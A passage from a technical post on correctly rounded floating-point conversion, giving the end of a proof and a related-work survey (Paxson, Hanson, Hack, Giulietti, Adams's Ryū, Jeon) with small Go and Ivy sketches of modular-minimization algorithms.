By <a href="#lemma5">Lemma 5</a> and <a href="#lemma6">Lemma 6</a>,
<math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>. <math><mo>∎</mo></math>
</div>
<div class=lemma id=theorem2>
<p>
<b>Theorem 2</b>. For the cases used in the printing and parsing algorithms, namely <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math> with (printing) <math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math> and (parsing) <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>, <math><mtext>Scale</mtext></math> is correct and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. Follows from <a href="#lemma3">Lemma 3</a>, <a href="#lemma11">Lemma 11</a>, and <a href="#lemma12">Lemma 12</a>. <math><mo>∎</mo></math>
</div>
<a class=anchor href="#related_work"><h2 id="related_work">Related Work</h2></a>
<p>
Parts of this proof have been put together in different ways
for other purposes before, most notably to prove that
exact <i>truncated</i> scaling can be implemented using 128-bit mantissas
in floating-point parsing and printing algorithms.
This section traces the history of the ideas as best I have been able
to determine it.
In these summaries, I am using the terminology and
notation of this post—such as top, middle, bottom,
<math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math> and <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>—for consistency and ease of understanding.
Those terms and notations do not appear in the actual related work.
<p>
This section is concerned with the proof methods in these papers
and only touches on the actual algorithms to the extent that they
are relevant to what was proved. The <a href="fp#related">main post’s related work</a>
discusses the algorithms in more detail.
<a class=anchor href="#paxson_1991"><h3 id="paxson_1991">Paxson 1991</h3></a>
<p>
→ Vern Paxson, “<a href="https://www.icir.org/vern/papers/testbase-report.pdf">A Program for Testing IEEE Decimal-Binary Conversion</a>”, class paper 1991.
<p>
The earliest work that I have found that linked modular minimization
to floating-point conversions
is Paxson’s 1991 paper, already mentioned above and
written for one of William Kahan’s graduate classes.
Paxson credits Tim Peters
for the modular minimization algorithms,
citing an email discussion on <code>validgh!numeric-interest@uunet.uu.net</code> in April 1991:<blockquote>
<p>
In the following section we derive a modular
equation which if minimized produces especially difficult conversion inputs; those
that lie as close as possible to exactly half way between two representable outputs.
We then develop the theoretical framework for demonstrating the correctness of
two algorithms developed by Tim Peters for solving such a modular minimization
problem in O(log(N)) time.</blockquote>
<p>
I have been unable to find copies of the <code>numeric-interest</code> email discussion.
<p>
Peters broke down the minimization problem into a two step process,
which I followed in this proof.
Using this post’s notation (<math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>=</mo><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi></mrow></math>),
the two steps in Paxson’s paper (with two algorithms each) are:
<ul>
<li>
<i>FirstModBelow</i>: Find the first <math><mrow><mi>x</mi><mo>≥</mo><mn>0</mn></mrow></math> with <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≤</mo><mtext><i>hi</i></mtext></mrow></math>. <br>
<i>FirstModAbove</i>: Find the first <math><mrow><mi>x</mi><mo>≥</mo><mn>0</mn></mrow></math> with <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≥</mo><MI>𝑙𝑜</MI></mrow></math>.
<li>
<i>ModMin</i>: Find the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> that maximizes <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≤</mo><mtext><i>hi</i></mtext></mrow></math>. <br>
<i>ModMax</i>: Find the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> that minimizes <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≥</mo><MI>𝑙𝑜</MI></mrow></math>.</ul>
<p>
(The names <i>ModMin</i> and <i>ModMax</i> seem inverted from their definitions,
but perhaps “Min” refers to finding something below a limit and “Max”
to finding something above a limit.
They are certainly inverted from this post’s usage.)
<p>
In contrast, this post’s algorithms are:
<ul>
<li>
<code>modfirst</code>: Find the first <math><mrow><mi>x</mi><mo>≥</mo><mn>0</mn></mrow></math> with <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>.
<li>
<code>modfind</code>: Find the first <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> with <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>.
<li>
<code>modmin</code>: Find the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> that minimizes <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>.
<li>
<code>modminge</code>: Find the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> that minimizes <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≥</mo><MI>𝑙𝑜</MI></mrow></math>.
<li>
<code>modmax</code>: Find the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> that maximizes <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>.</ul>
<p>
It is possible to use <code>modfirst</code> to implement
Paxson’s <i>FirstModBelow</i> and <i>FirstModAbove</i>, and vice versa,
so they are equivalent in power.
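<p>
To make a few of these definitions concrete, here is a naive linear-scan reference in Go (a sketch of mine, not this post’s implementation; the real versions run in a logarithmic number of steps via the GCD-like <code>modfirst</code>, not by scanning):
<pre class='language-go'>package main

import "fmt"

// xr computes the residue x_R = x·c mod m.
func xr(x, c, m uint64) uint64 { return x * c % m }

// modfirst: the first x ≥ 0 with x_R ∈ [lo, hi].
func modfirst(lo, hi, c, m uint64) uint64 {
	for x := uint64(0); ; x++ {
		if r := xr(x, c, m); lo <= r && r <= hi {
			return x
		}
	}
}

// modmin: the x ∈ [xmin, xmax] that minimizes x_R.
func modmin(xmin, xmax, c, m uint64) uint64 {
	best := xmin
	for x := xmin; x <= xmax; x++ {
		if xr(x, c, m) < xr(best, c, m) {
			best = x
		}
	}
	return best
}

// modmax: the x ∈ [xmin, xmax] that maximizes x_R.
func modmax(xmin, xmax, c, m uint64) uint64 {
	best := xmin
	for x := xmin; x <= xmax; x++ {
		if xr(x, c, m) > xr(best, c, m) {
			best = x
		}
	}
	return best
}

func main() {
	// Tiny example with c = 3, m = 8: the residues 3x mod 8 for x = 1..7
	// are 3, 6, 1, 4, 7, 2, 5.
	fmt.Println(modfirst(5, 7, 3, 8)) // 2 (first x with residue in [5, 7])
	fmt.Println(modmin(1, 7, 3, 8))   // 3 (residue 1)
	fmt.Println(modmax(1, 7, 3, 8))   // 5 (residue 7)
}
</pre>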
<p>
In Paxson’s paper,
the implementation and correctness of <i>FirstModBelow</i> and <i>FirstModAbove</i>
depend on computing the convergents of continued fractions of <math><mrow><mi>c</mi><mn>/</mn><mi>m</mi></mrow></math>
and proving properties about them.
Specifically, the result of <i>FirstModBelow</i> must be the denominator of a
convergent or semiconvergent in the continued fraction for <math><mrow><mi>c</mi><mn>/</mn><mi>m</mi></mrow></math>,
so it suffices to find the last even convergent <math><mrow><mi>p</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi></mrow></msub><mn>/</mn><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi></mrow></msub></mrow></math> such that <math><mrow><mo stretchy=false>(</mo><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi></mrow></msub><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub><mo>></mo><mtext><i>hi</i></mtext></mrow></math>
but <math><mrow><mo stretchy=false>(</mo><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mo stretchy=false>(</mo><mi>i</mi><mo>+</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></msub><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub><mo><</mo><mtext><i>hi</i></mtext></mrow></math>,
and then
compute the correct <math><mrow><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi></mrow></msub><mo>+</mo><mi>k</mi><mo>·</mo><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi><mo>+</mo><mn>1</mn></mrow></msub></mrow></math>
by looking at how much <math><mrow><mo stretchy=false>(</mo><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi><mo>+</mo><mn>1</mn></mrow></msub><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math> subtracts from <math><mrow><mo stretchy=false>(</mo><mi>q</mi><msub><mspace height='0em' /><mrow><mn>2</mn><mi>i</mi></mrow></msub><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math> and
subtracting it just enough times.
I had resigned myself to implementing this approach before I found
David Wärn’s simpler proof of the direct GCD-like approach in <code>modfirst</code>.
The intermediate steps in <math><mrow><mtext>GCD</mtext><mo stretchy=false>(</mo><mi>p</mi><mo>,</mo><mi>q</mi><mo stretchy=false>)</mo></mrow></math> are exactly the continued fraction representation of <math><mrow><mi>p</mi><mn>/</mn><mi>q</mi></mrow></math>,
so it is not surprising that both GCDs and
continued fractions can be used
for modular search.
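<p>
As a small illustration of that connection (not part of the proof), the partial quotients of the continued fraction of <math><mrow><mi>p</mi><mn>/</mn><mi>q</mi></mrow></math> are exactly the quotients produced by the divisions in Euclid’s algorithm:
<pre class='language-go'>package main

import "fmt"

// partialQuotients returns the continued fraction partial quotients of p/q;
// they are the successive quotients computed by GCD(p, q).
func partialQuotients(p, q uint64) []uint64 {
	var as []uint64
	for q != 0 {
		as = append(as, p/q)
		p, q = q, p%q
	}
	return as
}

func main() {
	// 7/31 = 0 + 1/(4 + 1/(2 + 1/3))
	fmt.Println(partialQuotients(7, 31)) // [0 4 2 3]
}
</pre>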
<p>
No matter how <code>modfirst</code> is implemented,
the critical insight is Peters’s observation
that “find the first” is a good building block for
the more sophisticated searches.
<p>
Paxson’s <i>ModMin</i>/<i>ModMax</i> are tailored to a
slightly different problem than we are solving.
Instead of analyzing a particular multiplicative constant
(a specific <math><MI>𝑝𝑚</MI></math> or <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> value),
Paxson is looking directly for decimal numbers as close as
possible to midpoints between binary floating-point numbers and vice versa.
That means finding <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math> near <math><mrow><mi>m</mi><mn>/2</mn></mrow></math> modulo <math><mi>m</mi></math>.
This post’s proof is concerned with those values as well,
but also the ones near integers. So we look for <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>
near zero modulo <math><mrow><mn>2</mn><mi>m</mi></mrow></math>, which is a little simpler.
Paxson couldn’t use that because it would find numbers
near zero modulo <math><mi>m</mi></math> in addition to numbers near <math><mrow><mi>m</mi><mn>/2</mn></mrow></math> modulo <math><mi>m</mi></math>.
The former are especially easy to round, so Paxson needs to exclude them.
(In contrast, numbers near zero modulo <math><mi>m</mi></math> are a problem for <math><mtext>Scale</mtext></math>
because the caller might want to take their floor or ceiling.)
<a class=anchor href="#hanson_1997"><h3 id="hanson_1997">Hanson 1997</h3></a>
<p>
→ Kenton Hanson, “<a href="https://web.archive.org/web/20000607192440/http://www.dnai.com/~khanson/ECRBDC.html">Economical Correctly Rounded Binary Decimal Conversions</a>”, published online 1997.
<p>
The next analysis of floating-point rounding difficulty that I found
is a paper published on the web by Kenton Hanson in 1997,
reporting work done earlier at Apple Computer using a <a href="https://en.wikipedia.org/wiki/Macintosh_Quadra">Macintosh Quadra</a>,
which perhaps dates it to the early 1990s.
Hanson’s web site is down and email to the address on the paper bounces. The link above is to a copy on the Internet Archive, but it omits the figures,
which seem crucial to fully understanding the paper.
<p>
Hanson identified patterns that can be exploited to grow short “hard”
conversions into longer ones.
Then he used those longest hard conversions as the basis for an argument
that conversion works correctly for all conversions up to that length:
“Once this worst case is determined we have shown how we can
guarantee correct conversions using arithmetic that is slightly
more than double the precision of the target destinations.”
<p>
Hanson focused on 113-bit floating-point numbers, using 256-bit mantissas
for scaling, and only rounding conversions.
I expect that his approach would have worked for
proving that 53-bit floating-point
numbers can be converted with 128-bit mantissas,
but I have not reconstructed it and confirmed that.
<a class=anchor href="#hack_2004"><h3 id="hack_2004">Hack 2004</h3></a>
<p>
→ Gordon Slishman, “<a href="https://mp7.watson.ibm.com/f55d084fadf9ae59852574ab0058f749.html">Fast and Perfectly Rounding Decimal/Hexadecimal Conversions</a>”, IBM Research Report, April 1990. <br>
→ P.H. Abbott <i>et al.</i>, “<a href="https://ieeexplore.ieee.org/document/5389154">Architecture and software support in IBM S/390 Parallel Enterprise Servers for IEEE Floating-Point arithmetic</a>”, <i>IBM Journal of Research and Development</i>, September 1999. <br>
→ Michel Hack, “<a href="https://dominoweb.draco.res.ibm.com/reports/rc23203.pdf">On Intermediate Precision Required for Correctly-Rounding Decimal-to-Binary Floating-Point Conversion</a>”, IBM Technical Paper, 2004.
<p>
The next similar discovery appears to be Hack’s 2004 work at IBM.
<p>
In 1990, Slishman had published a conversion method that used
floating-point approximations, like in this post.
Slishman used a 16-bit middle and recognized that
a non-<code>0xFFFF</code> <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> implied the correctness of the top section.
His algorithm fell back to a slow bignum implementation
when <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> was <code>0xFFFF</code> and carry error could not be ruled out (approximately <math><mrow><mn>1/2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></math> of the time).
(Hack defined <math><MI>𝑝𝑚</MI></math> to be a floor instead of a ceiling, so the error condition
is inverted from ours.)
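<p>
To make the middle-check idea concrete, here is a schematic sketch in Go, rendered in this post’s 64×128-bit terms rather than Slishman’s actual arithmetic; the function name and field widths are mine. Because the approximation is a floor and the low 64 bits of the product are discarded, the computed value can only understate the true product, by less than two units of the second 64-bit word; so if the 16 bits just below the top word are not all ones, the missing amount cannot carry into the top word.
<pre class='language-go'>package main

import (
	"fmt"
	"math/bits"
)

// scaleTop returns the top 64 bits of x·pm, where pm = pmHi·2^64 + pmLo is a
// 128-bit floor approximation of the scaling constant, along with a flag
// reporting whether the 16-bit middle field certifies that the top is exact.
func scaleTop(x, pmHi, pmLo uint64) (top uint64, topExact bool) {
	hi1, lo1 := bits.Mul64(x, pmHi) // contributes hi1·2^128 + lo1·2^64
	hi2, _ := bits.Mul64(x, pmLo)   // contributes hi2·2^64; low word discarded
	mid, carry := bits.Add64(lo1, hi2, 0)
	top = hi1 + carry
	middle := mid >> 48 // the 16 bits just below the top word
	return top, middle != 0xFFFF
}

func main() {
	top, exact := scaleTop(1<<63, 0x9876543210fedcba, 0x1122334455667788)
	fmt.Printf("%#x %v\n", top, exact)
}
</pre>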
<p>
In 1999, Abbott <i>et al.</i> (including Hack) published a comprehensive article
about the S/390’s new support for IEEE floating-point
(as opposed to its <a href="https://en.wikipedia.org/wiki/IBM_hexadecimal_floating-point">IBM hexadecimal floating point</a>).
In that article, they observed (like Paxson) that difficult numbers
can be generated by using continued fraction expansion of <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> values.
They also observed that bounding the size of the
continued fraction expansion would bound the precision required,
potentially leading to bignum-free conversions.
<p>
Following publication of that article, Alan Stern initiated “a spirited e-mail exchange
during the spring of 2000” and “pointed out that the hints at improvement
mentioned in that article were still too conservative.”
As a result of that exchange, Hack launched a renewed investigation
of the error behavior, leading to the 2004 technical report.
<p>
Hack’s report only addresses decimal-to-binary (parsing) with a fixed-length input,
not binary-to-decimal (printing),
even though the comments in the 1999 article were about both directions
and the techniques would apply equally well to binary-to-decimal.
<p>
In the terminology of this post,
Hack proved that analysis of the continued fraction
for a specific <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> can establish a lower bound <math><mi>L</mi></math>
such that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo><</mo><mi>L</mi></mrow></math> if and only if
<math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn></mrow></math>.
For an <math><mi>n</mi></math>-digit decimal input,
<math><mrow><mi>L</mi><mo>=</mo><mn>1/</mn><mo stretchy=false>(</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>n</mi></msup><mo>·</mo><mo stretchy=false>(</mo><mi>k</mi><mo>+</mo><mn>2</mn><mo stretchy=false>)</mo><mo stretchy=false>)</mo></mrow></math> where <math><mi>k</mi></math> is the maximum partial quotient
in the continued fraction expansion of <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>
following certain convergents.
<p>
Hack summarizes:<blockquote>
<p>
Using Continued Fraction expansions of a set of ratios of powers of two and five
we can derive tight bounds on the intermediate precision required to
perform correctly-rounding floating-point conversion:
it is the sum of three components: the number of bits in the target format,
the number of bits in the source format, and the number of bits in the largest
partial quotient that follows a partial convergent of the “right” size
among those Continued Fraction expansions.
(This is in addition to the small number of bits needed to cover computational loss,
e.g. when multiple truncating or rounding multiplications are performed.)
<p>
When both source and target precision are fixed, the set of ratios to be
expanded grows linearly with the target exponent range, and is small enough
to permit a simple exhaustive search, in the case of the IEEE 754 standard
formats: the extra number of bits (3rd component of the sum mentioned above)
is 11 for 19-digit Double Precision and 13 for 36-digit Extended Precision.</blockquote>
<p>
I admit to discomfort with both Paxson’s and Hack’s
use of continued fraction analysis.
The math is subtle, and it seems easy to overlook a relevant case.
For example Paxson needs semiconvergents for <i>FirstModBelow</i>
but Hack does not explicitly mention them.
Even though I trust that both Paxson’s and Hack’s results are correct,
I do not trust myself to adapt them to new contexts
without making unjustified mathematical assumptions.
In contrast, the explicit GCD-like algorithm in <code>modfirst</code>
and explicit searches based on it seem far less
sophisticated and less error-prone to adapt.
<a class=anchor href="#giulietti_2018"><h3 id="giulietti_2018">Giulietti 2018</h3></a>
<p>
→ Raffaello Giulietti, “<a href="https://drive.google.com/file/d/1IEeATSVnEE6TkrHlCYNY2GjaraBjOT4f/edit">The Schubfach way to render doubles</a>,” published online, 2018, revised 2021. <br>
→ Dmitry Nadhezin, <a href="https://github.com/nadezhin/verify-todec">nadezhin/verify-todec GitHub repository</a>, published online, 2018.
<p>
Raffaello Giulietti developed the Schubfach algorithm while working on
<a href="https://bugs.openjdk.org/browse/JDK-4511638">Java bug JDK-4511638</a>,
that <code>Double.toString</code> sometimes returned non-shortest results,
most notably ‘9.999999999999999e22’ for 1e23.
Giulietti’s original solution contained a fallback to multiprecision
arithmetic in certain cases,
and he wrote a paper proving the solution’s correctness.
(I have been unable to find either that original code or the first version of the paper,
which was apparently titled “Rendering doubles in Java”.)
<p>
Dmitry Nadhezin set out to <a href="https://github.com/nadezhin/verify-todec/blob/master/README.md">formally check the proof</a> using the ACL2 theorem prover.
During that effort, Giulietti and Nadhezin came across Hack’s 2004 paper
and realized they could remove the multiprecision arithmetic entirely.
Nadhezin adapted Hack’s analysis and proved Giulietti’s entire conversion algorithm
correct using the ACL2 theorem prover.
As part of that proof, Nadhezin proved (and formally verified)
that the spacing around exact integer results that might arise during
Schubfach’s printing algorithm is at least <math><mrow><mi>ε</mi><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mn>64</mn></mrow></msup></mrow></math> in either direction,
allowing the use of 126-bit <math><MI>𝑝𝑚</MI></math> values.
(Using 126 instead of 128 is necessary
because Java has only a signed 64-bit integer type.)
<!-- Note: Guy Steele reviewed the paper. https://bugs.openjdk.org/browse/JDK-8202555 -->
<a class=anchor href="#adams_2018"><h3 id="adams_2018">Adams 2018</h3></a>
<p>
→ Ulf Adams, “<a href="https://dl.acm.org/doi/10.1145/3192366.3192369">Ryū: Fast Float-to-String Conversion</a>”, ACM PLDI 2018.
<!-- TODO what was Adams's inspiration? -->
<p>
Independent of Giulietti’s work,
Ulf Adams developed a different floating-point printing algorithm named Ryū,
also based on 128-bit (or in Java, 126-bit) <math><MI>𝑝𝑚</MI></math> values.
Adams proved the correctness of a computation for
<math><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mn>/10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow></math> using <math><mrow><mo stretchy=false>⌊</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>⌋</mo></mrow></math> for positive <math><mi>p</mi></math>
and <math><mrow><mo stretchy=false>⌈</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>⌉</mo></mrow></math> for negative <math><mi>p</mi></math>.
Doubling <math><mi>x</mi></math> provides the ½ bit,
but Ryū does not compute the sticky bit
as part of that computation.
Instead, Ryū computes an exactness bit
(the inverse of the sticky bit)
by explicitly testing <math><mrow><mi>x</mi><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>=</mo><mn>0</mn></mrow></math> for <math><mrow><mi>p</mi><mo>></mo><mn>0</mn></mrow></math>
and <math><mrow><mi>x</mi><MO>mod</MO><mn>5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo>=</mo><mn>0</mn></mrow></math> for <math><mrow><mi>p</mi><mo><</mo><mn>0</mn></mrow></math>.
The latter is done iteratively, requiring
up to 23 64-bit divisions in the worst case.
(It is possible to <a href="https://go.googlesource.com/go/+/refs/tags/go1.26rc1/src/internal/strconv/math.go#93">reduce this to a single 64-bit multiplication</a>
by a constant obtained from table lookup,
but Ryū does not.)
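<p>
The table-based test alluded to above is, at heart, the standard exact-divisibility check for an odd divisor: <code>x</code> is a multiple of odd <code>d</code> exactly when <code>x*inv(d)</code>, computed modulo <code>2**64</code>, is at most <code>(2**64-1)/d</code>, where <code>inv(d)</code> is the multiplicative inverse of <code>d</code> modulo <code>2**64</code>. Here is a sketch in Go with my own names and table; it is not Ryū’s code, and not necessarily how the linked Go implementation arranges its constants.
<pre class='language-go'>package main

import "fmt"

// modInverse64 computes the inverse of odd d modulo 2**64 by Newton iteration;
// each step doubles the number of correct low-order bits.
func modInverse64(d uint64) uint64 {
	inv := d // correct to 3 bits for odd d
	for i := 0; i < 5; i++ {
		inv *= 2 - d*inv
	}
	return inv
}

const maxPow5 = 27 // 5**27 is the largest power of 5 below 2**64

var pow5Inv, pow5Cut [maxPow5 + 1]uint64

func init() {
	p := uint64(1)
	for k := 0; k <= maxPow5; k++ {
		pow5Inv[k] = modInverse64(p)
		pow5Cut[k] = ^uint64(0) / p
		if k < maxPow5 {
			p *= 5
		}
	}
}

// divisiblePow5 reports whether x is divisible by 5**k,
// using one multiplication and one comparison.
func divisiblePow5(x uint64, k int) bool {
	return x*pow5Inv[k] <= pow5Cut[k]
}

func main() {
	fmt.Println(divisiblePow5(625, 4), divisiblePow5(626, 4)) // true false
}
</pre>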
<p>
Like any of these proofs,
Adams’s proof of correctness of the truncated result
needs to analyze specific <math><MI>𝑝𝑚</MI></math> or <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> values.
Adams chose to analyze the <math><MI>𝑝𝑚</MI></math> values
and defined a function <math><mrow><mtext><code>minmax_euclid</code></mtext><mo stretchy=false>(</mo><mi>a</mi><mo>,</mo><mi>b</mi><mo>,</mo><mi>M</mi><mo stretchy=false>)</mo></mrow></math>
that returns the minimum and maximum values of <math><mrow><mi>x</mi><mo>·</mo><mi>a</mi><MO>mod</MO><mi>b</mi></mrow></math> for <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mi>M</mi><mrow><mspace height='0em' /><mn>′</mn>
</mrow><mo stretchy=false>]</mo></mrow></math>
for some <math><mrow><mi>M</mi><mrow><mspace height='0em' /><mn>′</mn>
</mrow><mo>≥</mo><mi>M</mi></mrow></math> chosen by the algorithm.
The paper includes a dense page-long proof of the correctness of
<code>minmax_euclid</code>, but it must contain a mistake,
since <code>minmax_euclid</code> turns out not to be correct.
As one example, Junekey Jeon has pointed out that <math><mrow><mtext><code>minmax_euclid</code></mtext><mo stretchy=false>(</mo><mn>3</mn><mo>,</mo><mn>8</mn><mo>,</mo><mn>7</mn><mo stretchy=false>)</mo></mrow></math>
returns a minimum of 1 and maximum of 0.
We can verify this by implementing <code>minmax_euclid</code> in Ivy:
<pre class='language-ivy'>op minmax_euclid (a b M) =
s t u v = 1 0 0 1
:while 1
:while b >= a
b u v = b u v - a s t
(-u) >= M: :ret a b
:end
b == 0: :ret 1 (b-1)
:while a >= b
a s t = a s t - b u v
s >= M: :ret a b
:end
a == 0: :ret 1 (b-1)
:end
minmax_euclid 3 8 7
-- out --
1 0
</pre>
<p>
Jeon also points out that the trouble begins on the first line of Adams’s proof,
which claims that <math><mrow><mi>a</mi><mo>≤</mo><mo stretchy=false>(</mo><MO form='prefix'>−</MO><mi>a</mi><mo stretchy=false>)</mo><MO>mod</MO><mi>b</mi></mrow></math>,
but that is false for <math><mrow><mi>a</mi><mo>></mo><mi>b</mi><mn>/2</mn></mrow></math>.
However, the general idea is right, and Adams’s Ryū repository
contains a <a href="https://github.com/ulfjack/ryu/blob/6a02945a5abd/src/main/java/info/adams/ryu/analysis/EuclidMinMax.java#L83">more complex and apparently fixed version</a> of the max
calculation.
Even corrected, the results are loose in two directions: they include <math><mi>x</mi></math> both smaller
and larger than the exact range <math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>−</MO><mn>1</mn></mrow></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo>−</mo><mn>1</mn><mo stretchy=false>]</mo></mrow></math>.
<a class=anchor href="#jeon_2020"><h3 id="jeon_2020">Jeon 2020</h3></a>
<p>
→ Junekey Jeon, “<a href="https://fmt.dev/papers/Grisu-Exact.pdf">Grisu-Exact: A Fast and Exact Floating-Point Printing Algorithm</a>”, published online, 2020.
<p>
In 2020, Jeon published a paper about Grisu-Exact, an exact variation of the Grisu algorithm
without the need for a bignum fallback algorithm.
Jeon relied on Adams’s general proof approach but pointed out the problems
with <code>minmax_euclid</code> mentioned in the previous section and supplied a replacement
algorithm and proof of its correctness.
<pre class='language-ivy'>op minmax_euclid (a b M) =
modulo = b
s u = 1 0
:while 1
q = (ceil b/a) - 1
b1 = b - q*a
u1 = u + q*s
:if M < u1
k = floor (M-u) / s
:ret a ((modulo - b) + k*a)
:end
p = (ceil a/b1) - 1
a1 = a - p*b1
s1 = s + p*u1
:if M < s1
k = floor (M-s) / u1
:ret (a-k*b1) (modulo - b1)
:end
:if (b1 == b) and (a1 == a)
:if M < s1 + u1
:ret a1 (modulo - b1)
:else
:ret 0 (modulo - b1)
:end
:end
a b s u = a1 b1 s1 u1
:end
minmax_euclid 3 8 7
-- out --
1 7
</pre>
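<p>
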